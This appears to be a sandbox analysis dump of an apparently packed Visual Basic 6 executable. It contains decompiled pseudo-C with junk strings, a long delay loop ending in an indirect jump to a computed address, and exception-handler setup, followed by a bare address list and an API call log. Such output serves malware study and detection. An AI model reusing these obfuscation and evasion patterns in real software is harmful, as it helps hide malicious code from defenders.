					_v8 = 0x23;
					L00401580();
					L00401598();
					_v8 = 0x24;
					L0040151A();
					_v8 = 0x25;
					__eflags =  *0x43039c;
					if( *0x43039c != 0) {
						_v592 = 0x43039c;
					} else {
						_push(0x43039c);
						_push(0x40398c);
						L00401592();
						_v592 = 0x43039c;
					}
					_v396 =  *_v592;
					_t740 =  *((intOrPtr*)( *_v396 + 0x1c))(_v396,  &_v236);
					asm("fclex");
					_v400 = _t740;
					__eflags = _v400;
					if(_v400 >= 0) {
						_t461 =  &_v596;
						 *_t461 = _v596 & 0x00000000;
						__eflags =  *_t461;
					} else {
						_push(0x1c);
						_push(0x40397c);
						_push(_v396);
						_push(_v400);
						L0040158C();
						_v596 = _t740;
					}
					_v404 = _v236;
					_t744 =  *((intOrPtr*)( *_v404 + 0x50))(_v404);
					asm("fclex");
					_v408 = _t744;
					__eflags = _v408;
					if(_v408 >= 0) {
						_t473 =  &_v600;
						 *_t473 = _v600 & 0x00000000;
						__eflags =  *_t473;
					} else {
						_push(0x50);
						_push(0x4039d4);
						_push(_v404);
						_push(_v408);
						L0040158C();
						_v600 = _t744;
					}
					L00401586();
				}
				_v8 = 0x27;
				_v384 =  *0x401320;
				L0040159E();
				_v372 = 0x7fcc0f;
				 *((intOrPtr*)( *_a4 + 0x710))(_a4, 0x518ef8,  &_v372,  &_v220, 0xb3a85e80, 0x5b05, 0x34a425, L"milksop",  &_v384, 0x14d42aa0, 0x5afb,  &_v392);
				_v116 = _v392;
				_v112 = _v388;
				L0040154A();
				_v8 = 0x28;
				 *((intOrPtr*)( *_a4 + 0x714))(_a4,  &_v384);
				_v84 = _v384;
				_v8 = 0x29;
				L0040159E();
				_v372 =  *0x401318;
				_t687 =  *((intOrPtr*)( *_a4 + 0x6fc))(_a4,  &_v372, L"ABILDGRAAT",  &_v220, 0xd31c9e10, 0x5af7,  &_v384);
				_v396 = _t687;
				__eflags = _v396;
				if(_v396 >= 0) {
					_t513 =  &_v604;
					 *_t513 = _v604 & 0x00000000;
					__eflags =  *_t513;
				} else {
					_push(0x6fc);
					_push(0x4034e4);
					_push(_a4);
					_push(_v396);
					L0040158C();
					_v604 = _t687;
				}
				_v216 = _v384;
				_t863 =  &_v220;
				L0040154A();
				while(1) {
					_v8 = 0x2b;
					_t689 = _v128 + 1;
					__eflags = _t689;
					if(_t689 < 0) {
						break;
					}
					_v128 = _t689;
					_v8 = 0x2c;
					__eflags = _v128 - 0x16581;
					if(_v128 >= 0x16581) {
						_v8 = 0x2f;
						_t940 = _t971;
						 *((intOrPtr*)(_t940 + 0xbc)) = 0x40e116;
						_push(_t950);
						_push(_t952);
						_push(0);
						_push(4);
						_push(8);
						goto ( *((intOrPtr*)(_t940 + 0xbc)));
					}
				}
				L00401466();
				_push(_t971);
				_push(_t863);
				_push(_t863);
				_push(0x4013a6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t977;
				_push(_t849);
				_push(_t952);
				_push(_t950);
				_v244 = _t977 - 0x9c;
				_v240 = 0x401340;
				_v256 = 0;
				_v260 = 0;
				_v264 = 0;
				_v276 = 0;
				_v284 = 0;
				_v288 = 0;
				_v292 = 0;
				_v296 = 0;
				_v300 = 0;
				_v316 = 0;
				_v332 = 0;
				_v348 = 0;
				_v364 = 0;
				_v368 = 0;
				L0040159E();
				_t691 =  &_v316;
				_push(_t691);
				_v308 = 0x3076;
				_v316 = 2;
				L00401460();
				asm("sbb esi, esi");
				L00401550();
				__eflags =  ~( ~0x00000000);
				if( ~( ~0x00000000) == 0) {
					_t851 = _v0;
					_t951 = 0x40397c;
					goto L157;
				} else {
					__eflags =  *0x43039c; // 0x235e9a4
					if(__eflags == 0) {
						_push(0x43039c);
						_push(0x40398c);
						L00401592();
					}
					_t964 =  *0x43039c; // 0x235e9a4
					_t711 =  *((intOrPtr*)( *_t964 + 0x14))(_t964,  &_v72);
					asm("fclex");
					__eflags = _t711;
					if(_t711 >= 0) {
						_t951 = 0x40397c;
					} else {
						_push(0x14);
						_t951 = 0x40397c;
						_push(0x40397c);
						_push(_t964);
						_push(_t711);
						L0040158C();
					}
					_t712 = _v72;
					_t965 = _t712;
					_t713 =  *((intOrPtr*)( *_t712 + 0xc0))(_t712,  &_v140);
					asm("fclex");
					__eflags = _t713;
					if(_t713 >= 0) {
						_t852 = 0x40399c;
					} else {
						_push(0xc0);
						_t852 = 0x40399c;
						_push(0x40399c);
						_push(_t965);
						_push(_t713);
						L0040158C();
					}
					L00401586();
					__eflags =  *0x43039c;
					if( *0x43039c == 0) {
						_push(0x43039c);
						_push(0x40398c);
						L00401592();
					}
					_t966 =  *0x43039c; // 0x235e9a4
					_t715 =  *((intOrPtr*)( *_t966 + 0x14))(_t966,  &_v72);
					asm("fclex");
					__eflags = _t715;
					if(_t715 < 0) {
						_push(0x14);
						_push(_t951);
						_push(_t966);
						_push(_t715);
						L0040158C();
					}
					_t716 = _v72;
					_t967 = _t716;
					_t717 =  *((intOrPtr*)( *_t716 + 0xe0))(_t716,  &_v64);
					asm("fclex");
					__eflags = _t717;
					if(_t717 < 0) {
						_push(0xe0);
						_push(_t852);
						_push(_t967);
						_push(_t717);
						L0040158C();
					}
					_v64 = _v64 & 0x00000000;
					L00401598();
					L00401586();
					__eflags =  *0x43039c;
					if( *0x43039c == 0) {
						_push(0x43039c);
						_push(0x40398c);
						L00401592();
					}
					_t968 =  *0x43039c; // 0x235e9a4
					_t719 =  *((intOrPtr*)( *_t968 + 0x14))(_t968,  &_v72);
					asm("fclex");
					__eflags = _t719;
					if(_t719 < 0) {
						_push(0x14);
						_push(_t951);
						_push(_t968);
						_push(_t719);
						L0040158C();
					}
					_t720 = _v72;
					_t969 = _t720;
					_t721 =  *((intOrPtr*)( *_t720 + 0x60))(_t720,  &_v64);
					asm("fclex");
					__eflags = _t721;
					if(_t721 < 0) {
						_push(0x60);
						_push(_t852);
						_push(_t969);
						_push(_t721);
						L0040158C();
					}
					_v64 = _v64 & 0x00000000;
					L00401598();
					L00401586();
					_t986 =  *0x401338;
					_t851 = _v0;
					_t895 =  *_t851;
					asm("fnstsw ax");
					__eflags = _t721 & 0x0000000d;
					if((_t721 & 0x0000000d) != 0) {
						return __imp____vbaFPException();
					} else {
						_v180 = _t986;
						_v476 = _v180;
						_t691 =  *((intOrPtr*)(_t895 + 0x84))(_t851, _t895);
						asm("fclex");
						__eflags = _t691;
						if(_t691 < 0) {
							_push(0x84);
							_push(0x4034b4);
							_push(_t851);
							_push(_t691);
							L0040158C();
						}
						L157:
						_push(0x403a84);
						_push(0x403a8c);
						L00401532();
						L00401598();
						_push(_t691);
						_push(L"-10-");
						L00401532();
						L00401598();
						_push(_t691);
						_push(0x403bb8);
						L00401532();
						_v80 = _t691;
						_push( &_v88);
						_push( &_v104);
						_v88 = 8;
						L004014D8();
						_push( &_v104);
						_t695 =  &_v136;
						_push(_t695);
						_v128 = 0xa;
						_v136 = 0x8002;
						L004014DE();
						_push( &_v68);
						_push( &_v64);
						_push(2);
						L004014D2();
						_push( &_v104);
						_t699 =  &_v88;
						_push(_t699);
						_push(2);
						L00401562();
						__eflags = _t695;
						if(_t695 != 0) {
							__eflags =  *0x43039c;
							if( *0x43039c == 0) {
								_push(0x43039c);
								_push(0x40398c);
								L00401592();
							}
							_t959 =  *0x43039c; // 0x235e9a4
							_t701 =  *((intOrPtr*)( *_t959 + 0x14))(_t959,  &_v72);
							asm("fclex");
							__eflags = _t701;
							if(_t701 < 0) {
								_push(0x14);
								_push(_t951);
								_push(_t959);
								_push(_t701);
								L0040158C();
							}
							_t702 = _v72;
							_t960 = _t702;
							_t703 =  *((intOrPtr*)( *_t702 + 0xf8))(_t702,  &_v64);
							asm("fclex");
							__eflags = _t703;
							if(_t703 < 0) {
								_push(0xf8);
								_push(0x40399c);
								_push(_t960);
								_push(_t703);
								L0040158C();
							}
							_v64 = _v64 & 0x00000000;
							L00401598();
							L00401586();
							_push(1);
							_push(1);
							_push(1);
							_push( &_v88);
							L004014CC();
							_push( &_v88);
							L0040156E();
							L00401598();
							L00401550();
							__eflags =  *0x43039c;
							if( *0x43039c == 0) {
								_push(0x43039c);
								_push(0x40398c);
								L00401592();
							}
							_t961 =  *0x43039c; // 0x235e9a4
							_t707 =  *((intOrPtr*)( *_t961 + 0x14))(_t961,  &_v72);
							asm("fclex");
							__eflags = _t707;
							if(_t707 < 0) {
								_push(0x14);
								_push(_t951);
								_push(_t961);
								_push(_t707);
								L0040158C();
							}
							_t708 = _v72;
							_t962 = _t708;
							_t709 =  *((intOrPtr*)( *_t708 + 0xf0))(_t708,  &_v64);
							asm("fclex");
							__eflags = _t709;
							if(_t709 < 0) {
								_push(0xf0);
								_push(0x40399c);
								_push(_t962);
								_push(_t709);
								L0040158C();
							}
							_v64 = _v64 & 0x00000000;
							L00401598();
							L00401586();
							L004014C6();
							_t699 =  *((intOrPtr*)( *_t851 + 0x64))(_t851, _t709);
							asm("fclex");
							__eflags = _t699;
							if(_t699 < 0) {
								_push(0x64);
								_push(0x4034b4);
								_push(_t851);
								_push(_t699);
								L0040158C();
							}
						}
						_v44 = 0xea8c9360;
						asm("wait");
						_v40 = 0x5b07;
						_push(0x42f320);
						L0040154A();
						L0040154A();
						L0040154A();
						L0040154A();
						L0040154A();
						L0040154A();
						return _t699;
					}
				}
			}

0x0042cd3c
0x0042cd3c
0x0042cd3c
0x0042cd3d
0x0042cd3f
0x0042cd4e
0x0042cd5a
0x0042cd62
0x0042cd65
0x0042cd72
0x0042cd7b
0x0042cd7e
0x0042cd8d
0x0042cd90
0x0042cd97
0x0042cda5
0x0042cdc2
0x0042cda7
0x0042cda7
0x0042cdac
0x0042cdb1
0x0042cdb6
0x0042cdb6
0x0042cdd4
0x0042cdef
0x0042cdf2
0x0042cdf4
0x0042cdfa
0x0042ce01
0x0042ce23
0x0042ce23
0x0042ce23
0x0042ce03
0x0042ce03
0x0042ce05
0x0042ce0a
0x0042ce10
0x0042ce16
0x0042ce1b
0x0042ce1b
0x0042ce30
0x0042ce4b
0x0042ce51
0x0042ce53
0x0042ce59
0x0042ce60
0x0042ce85
0x0042ce85
0x0042ce85
0x0042ce62
0x0042ce62
0x0042ce67
0x0042ce6c
0x0042ce72
0x0042ce78
0x0042ce7d
0x0042ce7d
0x0042ce8e
0x0042ce9d
0x0042ceaa
0x0042ceaf
0x0042ceb6
0x0042ceb8
0x0042cebe
0x0042cec5
0x0042cecc
0x0042cee9
0x0042cece
0x0042cece
0x0042ced3
0x0042ced8
0x0042cedd
0x0042cedd
0x0042cefb
0x0042cf16
0x0042cf19
0x0042cf1b
0x0042cf21
0x0042cf28
0x0042cf4a
0x0042cf4a
0x0042cf4a
0x0042cf2a
0x0042cf2a
0x0042cf2c
0x0042cf31
0x0042cf37
0x0042cf3d
0x0042cf42
0x0042cf42
0x0042cf57
0x0042cf72
0x0042cf78
0x0042cf7a
0x0042cf80
0x0042cf87
0x0042cfac
0x0042cfac
0x0042cfac
0x0042cf89
0x0042cf89
0x0042cf8e
0x0042cf93
0x0042cf99
0x0042cf9f
0x0042cfa4
0x0042cfa4
0x0042cfb9
0x0042cfbe
0x0042cfc5
0x0042cfcc
0x0042cfe9
0x0042cfce
0x0042cfce
0x0042cfd3
0x0042cfd8
0x0042cfdd
0x0042cfdd
0x0042cffb
0x0042d016
0x0042d019
0x0042d01b
0x0042d021
0x0042d028
0x0042d04a
0x0042d04a
0x0042d04a
0x0042d02a
0x0042d02a
0x0042d02c
0x0042d031
0x0042d037
0x0042d03d
0x0042d042
0x0042d042
0x0042d057
0x0042d072
0x0042d078
0x0042d07a
0x0042d080
0x0042d087
0x0042d0ac
0x0042d0ac
0x0042d0ac
0x0042d089
0x0042d089
0x0042d08e
0x0042d093
0x0042d099
0x0042d09f
0x0042d0a4
0x0042d0a4
0x0042d0ba
0x0042d0c4
0x0042d0c9
0x0042d0d0
0x0042d0d7
0x0042d0f4
0x0042d0d9
0x0042d0d9
0x0042d0de
0x0042d0e3
0x0042d0e8
0x0042d0e8
0x0042d106
0x0042d121
0x0042d124
0x0042d126
0x0042d12c
0x0042d133
0x0042d155
0x0042d155
0x0042d155
0x0042d135
0x0042d135
0x0042d137
0x0042d13c
0x0042d142
0x0042d148
0x0042d14d
0x0042d14d
0x0042d162
0x0042d17d
0x0042d180
0x0042d182
0x0042d188
0x0042d18f
0x0042d1b1
0x0042d1b1
0x0042d1b1
0x0042d191
0x0042d191
0x0042d193
0x0042d198
0x0042d19e
0x0042d1a4
0x0042d1a9
0x0042d1a9
0x0042d1b8
0x0042d1bf
0x0042d1c9
0x0042d1ce
0x0042d1d5
0x0042d1da
0x0042d1da
0x0042d1df
0x0042d1e6
0x0042d1eb
0x0042d1f0
0x0042d1fd
0x0042d202
0x0042d203
0x0042d208
0x0042d215
0x0042d21a
0x0042d21b
0x0042d220
0x0042d22d
0x0042d232
0x0042d233
0x0042d238
0x0042d245
0x0042d24a
0x0042d24b
0x0042d250
0x0042d255
0x0042d25b
0x0042d26b
0x0042d272
0x0042d273
0x0042d278
0x0042d282
0x0042d292
0x0042d293
0x0042d299
0x0042d29a
0x0042d29f
0x0042d2ac
0x0042d2b3
0x0042d2ba
0x0042d2c1
0x0042d2c2
0x0042d2c4
0x0042d2d2
0x0042d2d9
0x0042d2da
0x0042d2dc
0x0042d2e1
0x0042d2e4
0x0042d2eb
0x0042d2ed
0x0042d2f3
0x0042d2fa
0x0042d301
0x0042d31e
0x0042d303
0x0042d303
0x0042d308
0x0042d30d
0x0042d312
0x0042d312
0x0042d330
0x0042d34b
0x0042d34e
0x0042d350
0x0042d356
0x0042d35d
0x0042d37f
0x0042d37f
0x0042d37f
0x0042d35f
0x0042d35f
0x0042d361
0x0042d366
0x0042d36c
0x0042d372
0x0042d377
0x0042d377
0x0042d38c
0x0042d3a7
0x0042d3ad
0x0042d3af
0x0042d3b5
0x0042d3bc
0x0042d3e1
0x0042d3e1
0x0042d3e1
0x0042d3be
0x0042d3be
0x0042d3c3
0x0042d3c8
0x0042d3ce
0x0042d3d4
0x0042d3d9
0x0042d3d9
0x0042d3ee
0x0042d3f4
0x0042d404
0x0042d40f
0x0042d414
0x0042d41b
0x0042d41d
0x0042d41f
0x0042d427
0x0042d428
0x0042d433
0x0042d434
0x0042d43e
0x0042d449
0x0042d44e
0x0042d455
0x0042d45c
0x0042d479
0x0042d45e
0x0042d45e
0x0042d463
0x0042d468
0x0042d46d
0x0042d46d
0x0042d48b
0x0042d4a6
0x0042d4a9
0x0042d4ab
0x0042d4b1
0x0042d4b8
0x0042d4da
0x0042d4da
0x0042d4da
0x0042d4ba
0x0042d4ba
0x0042d4bc
0x0042d4c1
0x0042d4c7
0x0042d4cd
0x0042d4d2
0x0042d4d2
0x0042d4e7
0x0042d502
0x0042d508
0x0042d50a
0x0042d510
0x0042d517
0x0042d53c
0x0042d53c
0x0042d53c
0x0042d519
0x0042d519
0x0042d51e
0x0042d523
0x0042d529
0x0042d52f
0x0042d534
0x0042d534
0x0042d543
0x0042d549
0x0042d54f
0x0042d562
0x0042d56d
0x0042d572
0x0042d57f
0x0042d58d
0x0042d590
0x0042d592
0x0042d598
0x0042d59f
0x0042d5be
0x0042d5be
0x0042d5be
0x0042d5a1
0x0042d5a1
0x0042d5a3
0x0042d5a8
0x0042d5ab
0x0042d5b1
0x0042d5b6
0x0042d5b6
0x0042d59f
0x0042d5c5
0x0042d5cc
0x0042d5d1
0x0042d5d7
0x0042d5dc
0x0042d5e6
0x0042d5ec
0x0042d5f3
0x0042d5fa
0x0042d617
0x0042d5fc
0x0042d5fc
0x0042d601
0x0042d606
0x0042d60b
0x0042d60b
0x0042d629
0x0042d644
0x0042d647
0x0042d649
0x0042d64f
0x0042d656
0x0042d678
0x0042d678
0x0042d678
0x0042d658
0x0042d658
0x0042d65a
0x0042d65f
0x0042d665
0x0042d66b
0x0042d670
0x0042d670
0x0042d685
0x0042d6a0
0x0042d6a6
0x0042d6a8
0x0042d6ae
0x0042d6b5
0x0042d6da
0x0042d6da
0x0042d6da
0x0042d6b7
0x0042d6b7
0x0042d6bc
0x0042d6c1
0x0042d6c7
0x0042d6cd
0x0042d6d2
0x0042d6d2
0x0042d6e8
0x0042d6f2
0x0042d6f7
0x0042d6fe
0x0042d70b
0x0042d710
0x0042d717
0x0042d71c
0x0042d723
0x0042d72a
0x0042d747
0x0042d72c
0x0042d72c
0x0042d731
0x0042d736
0x0042d73b
0x0042d73b
0x0042d759
0x0042d774
0x0042d777
0x0042d779
0x0042d77f
0x0042d786
0x0042d7a8
0x0042d7a8
0x0042d7a8
0x0042d788
0x0042d788
0x0042d78a
0x0042d78f
0x0042d795
0x0042d79b
0x0042d7a0
0x0042d7a0
0x0042d7b5
0x0042d7c9
0x0042d7cc
0x0042d7ce
0x0042d7d4
0x0042d7db
0x0042d7fd
0x0042d7fd
0x0042d7fd
0x0042d7dd
0x0042d7dd
0x0042d7df
0x0042d7e4
0x0042d7ea
0x0042d7f0
0x0042d7f5
0x0042d7f5
0x0042d80a
0x0042d80a
0x0042d80f
0x0042d816
0x0042d81b
0x0042d820
0x0042d82d
0x0042d832
0x0042d833
0x0042d838
0x0042d839
0x0042d846
0x0042d84b
0x0042d84c
0x0042d851
0x0042d858
0x0042d85e
0x0042d86b
0x0042d872
0x0042d873
0x0042d875
0x0042d87a
0x0042d87d
0x0042d884
0x0042d886
0x0042d88c
0x0042d893
0x0042d89d
0x0042d8a2
0x0042d8a9
0x0042d8a9
0x0042d8a9
0x0042d8b0
0x0042d8ba
0x0042d8bc
0x0042d8be
0x0042d8c0
0x0042d8c8
0x0042d8c9
0x0042d8d3
0x0042d8de
0x0042d8e3
0x0042d8ea
0x0042d8f4
0x0042d8fe
0x0042d904
0x0042d905
0x0042d90f
0x0042d91a
0x0042d91f
0x0042d926
0x0042d92d
0x0042d92f
0x0042d934
0x0042d934
0x0042d93a
0x0042d941
0x0042d946
0x0042d94c
0x0042d951
0x0042d95b
0x0042d961
0x0042d968
0x0042d96f
0x0042d98c
0x0042d971
0x0042d971
0x0042d976
0x0042d97b
0x0042d980
0x0042d980
0x0042d99e
0x0042d9b9
0x0042d9bc
0x0042d9be
0x0042d9c4
0x0042d9cb
0x0042d9ed
0x0042d9ed
0x0042d9ed
0x0042d9cd
0x0042d9cd
0x0042d9cf
0x0042d9d4
0x0042d9da
0x0042d9e0
0x0042d9e5
0x0042d9e5
0x0042d9fa
0x0042da15
0x0042da1b
0x0042da1d
0x0042da23
0x0042da2a
0x0042da4f
0x0042da4f
0x0042da4f
0x0042da2c
0x0042da2c
0x0042da31
0x0042da36
0x0042da3c
0x0042da42
0x0042da47
0x0042da47
0x0042da5d
0x0042da6a
0x0042da6f
0x0042da76
0x0042da80
0x0042da85
0x0042da8c
0x0042da91
0x0042da98
0x0042da9f
0x0042dabc
0x0042daa1
0x0042daa1
0x0042daa6
0x0042daab
0x0042dab0
0x0042dab0
0x0042dace
0x0042dae9
0x0042daec
0x0042daee
0x0042daf4
0x0042dafb
0x0042db1d
0x0042db1d
0x0042db1d
0x0042dafd
0x0042dafd
0x0042daff
0x0042db04
0x0042db0a
0x0042db10
0x0042db15
0x0042db15
0x0042db2a
0x0042db3e
0x0042db41
0x0042db43
0x0042db49
0x0042db50
0x0042db72
0x0042db72
0x0042db72
0x0042db52
0x0042db52
0x0042db54
0x0042db59
0x0042db5f
0x0042db65
0x0042db6a
0x0042db6a
0x0042db7f
0x0042db7f
0x0042db84
0x0042db8b
0x0042db90
0x0042db96
0x0042db9b
0x0042dba5
0x0042dbab
0x0042dbb2
0x0042dbb9
0x0042dbd6
0x0042dbbb
0x0042dbbb
0x0042dbc0
0x0042dbc5
0x0042dbca
0x0042dbca
0x0042dbe8
0x0042dc03
0x0042dc06
0x0042dc08
0x0042dc0e
0x0042dc15
0x0042dc37
0x0042dc37
0x0042dc37
0x0042dc17
0x0042dc17
0x0042dc19
0x0042dc1e
0x0042dc24
0x0042dc2a
0x0042dc2f
0x0042dc2f
0x0042dc44
0x0042dc5f
0x0042dc65
0x0042dc67
0x0042dc6d
0x0042dc74
0x0042dc99
0x0042dc99
0x0042dc99
0x0042dc76
0x0042dc76
0x0042dc7b
0x0042dc80
0x0042dc86
0x0042dc8c
0x0042dc91
0x0042dc91
0x0042dca7
0x0042dcb1
0x0042dcb6
0x0042dcbd
0x0042dcca
0x0042dccf
0x0042dcd6
0x0042dcdb
0x0042dce2
0x0042dce9
0x0042dd06
0x0042dceb
0x0042dceb
0x0042dcf0
0x0042dcf5
0x0042dcfa
0x0042dcfa
0x0042dd18
0x0042dd33
0x0042dd36
0x0042dd38
0x0042dd3e
0x0042dd45
0x0042dd67
0x0042dd67
0x0042dd67
0x0042dd47
0x0042dd47
0x0042dd49
0x0042dd4e
0x0042dd54
0x0042dd5a
0x0042dd5f
0x0042dd5f
0x0042dd74
0x0042dd88
0x0042dd8b
0x0042dd8d
0x0042dd93
0x0042dd9a
0x0042ddbc
0x0042ddbc
0x0042ddbc
0x0042dd9c
0x0042dd9c
0x0042dd9e
0x0042dda3
0x0042dda9
0x0042ddaf
0x0042ddb4
0x0042ddb4
0x0042ddc9
0x0042ddc9
0x0042ddce
0x0042dddb
0x0042ddec
0x0042ddf1
0x0042de42
0x0042de4e
0x0042de57
0x0042de60
0x0042de65
0x0042de7b
0x0042de87
0x0042de8a
0x0042de9c
0x0042dea7
0x0042ded9
0x0042dedf
0x0042dee5
0x0042deec
0x0042df0e
0x0042df0e
0x0042df0e
0x0042deee
0x0042deee
0x0042def3
0x0042def8
0x0042defb
0x0042df01
0x0042df06
0x0042df06
0x0042df1b
0x0042df21
0x0042df27
0x0042df2c
0x0042df2c
0x0042df36
0x0042df36
0x0042df39
0x00000000
0x00000000
0x0042df3f
0x0042df42
0x0042df49
0x0042df50
0x0042df54
0x0042df5b
0x0042df5d
0x0042df67
0x0042df68
0x0042df69
0x0042df6b
0x0042df6d
0x0042df6f
0x0042df6f
0x0042df52
0x0042ee82
0x0042ee87
0x0042ee8a
0x0042ee8b
0x0042ee8c
0x0042ee97
0x0042ee98
0x0042eea5
0x0042eea6
0x0042eea7
0x0042eea8
0x0042eeab
0x0042eeba
0x0042eebd
0x0042eec0
0x0042eec3
0x0042eec6
0x0042eec9
0x0042eecc
0x0042eecf
0x0042eed2
0x0042eed5
0x0042eed8
0x0042eedb
0x0042eede
0x0042eee1
0x0042eee7
0x0042eeec
0x0042eeef
0x0042eef0
0x0042eef7
0x0042eefe
0x0042ef0e
0x0042ef14
0x0042ef19
0x0042ef1c
0x0042f0c8
0x0042f0cb
0x00000000
0x0042ef22
0x0042ef22
0x0042ef28
0x0042ef2a
0x0042ef2f
0x0042ef34
0x0042ef34
0x0042ef39
0x0042ef46
0x0042ef49
0x0042ef4b
0x0042ef4d
0x0042ef60
0x0042ef4f
0x0042ef4f
0x0042ef51
0x0042ef56
0x0042ef57
0x0042ef58
0x0042ef59
0x0042ef59
0x0042ef65
0x0042ef72
0x0042ef74
0x0042ef7a
0x0042ef7c
0x0042ef7e
0x0042ef94
0x0042ef80
0x0042ef80
0x0042ef85
0x0042ef8a
0x0042ef8b
0x0042ef8c
0x0042ef8d
0x0042ef8d
0x0042ef9c
0x0042efa1
0x0042efa8
0x0042efaa
0x0042efaf
0x0042efb4
0x0042efb4
0x0042efb9
0x0042efc6
0x0042efc9
0x0042efcb
0x0042efcd
0x0042efcf
0x0042efd1
0x0042efd2
0x0042efd3
0x0042efd4
0x0042efd4
0x0042efd9
0x0042efe3
0x0042efe5
0x0042efeb
0x0042efed
0x0042efef
0x0042eff1
0x0042eff6
0x0042eff7
0x0042eff8
0x0042eff9
0x0042eff9
0x0042f001
0x0042f008
0x0042f010
0x0042f015
0x0042f01c
0x0042f01e
0x0042f023
0x0042f028
0x0042f028
0x0042f02d
0x0042f03a
0x0042f03d
0x0042f03f
0x0042f041
0x0042f043
0x0042f045
0x0042f046
0x0042f047
0x0042f048
0x0042f048
0x0042f04d
0x0042f057
0x0042f059
0x0042f05c
0x0042f05e
0x0042f060
0x0042f062
0x0042f064
0x0042f065
0x0042f066
0x0042f067
0x0042f067
0x0042f06f
0x0042f076
0x0042f07e
0x0042f083
0x0042f089
0x0042f08c
0x0042f08e
0x0042f090
0x0042f092
0x004013ac
0x0042f098
0x0042f098
0x0042f0a5
0x0042f0a9
0x0042f0af
0x0042f0b1
0x0042f0b3
0x0042f0b5
0x0042f0ba
0x0042f0bf
0x0042f0c0
0x0042f0c1
0x0042f0c1
0x0042f0d0
0x0042f0d0
0x0042f0d5
0x0042f0da
0x0042f0e4
0x0042f0e9
0x0042f0ea
0x0042f0ef
0x0042f0f9
0x0042f0fe
0x0042f0ff
0x0042f104
0x0042f109
0x0042f10f
0x0042f113
0x0042f114
0x0042f11b
0x0042f123
0x0042f124
0x0042f127
0x0042f128
0x0042f12f
0x0042f136
0x0042f141
0x0042f145
0x0042f146
0x0042f148
0x0042f150
0x0042f151
0x0042f154
0x0042f155
0x0042f157
0x0042f15f
0x0042f162
0x0042f168
0x0042f16f
0x0042f171
0x0042f176
0x0042f17b
0x0042f17b
0x0042f180
0x0042f18d
0x0042f190
0x0042f192
0x0042f194
0x0042f196
0x0042f198
0x0042f199
0x0042f19a
0x0042f19b
0x0042f19b
0x0042f1a0
0x0042f1aa
0x0042f1ac
0x0042f1b2
0x0042f1b4
0x0042f1b6
0x0042f1b8
0x0042f1bd
0x0042f1c2
0x0042f1c3
0x0042f1c4
0x0042f1c4
0x0042f1cc
0x0042f1d3
0x0042f1db
0x0042f1e0
0x0042f1e2
0x0042f1e4
0x0042f1e9
0x0042f1ea
0x0042f1f2
0x0042f1f3
0x0042f1fd
0x0042f205
0x0042f20a
0x0042f211
0x0042f213
0x0042f218
0x0042f21d
0x0042f21d
0x0042f222
0x0042f22f
0x0042f232
0x0042f234
0x0042f236
0x0042f238
0x0042f23a
0x0042f23b
0x0042f23c
0x0042f23d
0x0042f23d
0x0042f242
0x0042f24c
0x0042f24e
0x0042f254
0x0042f256
0x0042f258
0x0042f25a
0x0042f25f
0x0042f264
0x0042f265
0x0042f266
0x0042f266
0x0042f26e
0x0042f275
0x0042f27d
0x0042f28a
0x0042f291
0x0042f294
0x0042f296
0x0042f298
0x0042f29a
0x0042f29c
0x0042f2a1
0x0042f2a2
0x0042f2a3
0x0042f2a3
0x0042f298
0x0042f2a8
0x0042f2af
0x0042f2b0
0x0042f2b7
0x0042f2f2
0x0042f2fa
0x0042f302
0x0042f30a
0x0042f312
0x0042f31a
0x0042f31f
0x0042f31f
0x0042f092

APIs

__vbaChkstk.MSVBVM60(?,004013A6), ref: 0042CD5A
__vbaNew2.MSVBVM60(0040398C,0043039C,?,?,?,?,004013A6), ref: 0042CDB1
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040397C,00000014), ref: 0042CE16
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040399C,00000100), ref: 0042CE78
__vbaFreeObj.MSVBVM60(00000000,?,0040399C,00000100), ref: 0042CEAA
__vbaNew2.MSVBVM60(0040398C,0043039C), ref: 0042CED8
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040397C,00000014), ref: 0042CF3D
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040399C,00000138), ref: 0042CF9F
__vbaFreeObj.MSVBVM60(00000000,?,0040399C,00000138), ref: 0042CFB9
__vbaNew2.MSVBVM60(0040398C,0043039C), ref: 0042CFD8
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040397C,00000014), ref: 0042D03D
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040399C,00000140), ref: 0042D09F
__vbaFreeObj.MSVBVM60(00000000,?,0040399C,00000140), ref: 0042D0C4
__vbaNew2.MSVBVM60(0040398C,0043039C), ref: 0042D0E3
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040397C,00000014), ref: 0042D148
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040399C,00000068), ref: 0042D1A4
__vbaFreeObj.MSVBVM60(00000000,?,0040399C,00000068), ref: 0042D1C9
#531.MSVBVM60(Austrogaean3), ref: 0042D1DA
__vbaStrCat.MSVBVM60(00403A8C,00403A84), ref: 0042D1F0
__vbaStrMove.MSVBVM60(00403A8C,00403A84), ref: 0042D1FD
__vbaStrCat.MSVBVM60(00403A94,00000000,00403A8C,00403A84), ref: 0042D208
__vbaStrMove.MSVBVM60(00403A94,00000000,00403A8C,00403A84), ref: 0042D215
__vbaStrCat.MSVBVM60(00403AA0,00000000,00403A94,00000000,00403A8C,00403A84), ref: 0042D220
__vbaStrMove.MSVBVM60(00403AA0,00000000,00403A94,00000000,00403A8C,00403A84), ref: 0042D22D
__vbaStrCat.MSVBVM60(00403A84,00000000,00403AA0,00000000,00403A94,00000000,00403A8C,00403A84), ref: 0042D238
__vbaStrMove.MSVBVM60(00403A84,00000000,00403AA0,00000000,00403A94,00000000,00403A8C,00403A84), ref: 0042D245
__vbaStrCat.MSVBVM60(00403A8C,00000000,00403A84,00000000,00403AA0,00000000,00403A94,00000000,00403A8C,00403A84), ref: 0042D250
#542.MSVBVM60(?,00000008,00403A8C,00000000,00403A84,00000000,00403AA0,00000000,00403A94,00000000,00403A8C,00403A84), ref: 0042D273
__vbaVarTstNe.MSVBVM60(00008002,?,?,00000008,00403A8C,00000000,00403A84,00000000,00403AA0,00000000,00403A94,00000000,00403A8C,00403A84), ref: 0042D29A
__vbaFreeStrList.MSVBVM60(00000004,?,?,?,?,00008002,?,?,00000008,00403A8C,00000000,00403A84,00000000,00403AA0,00000000,00403A94), ref: 0042D2C4
__vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?,?,004013A6), ref: 0042D2DC
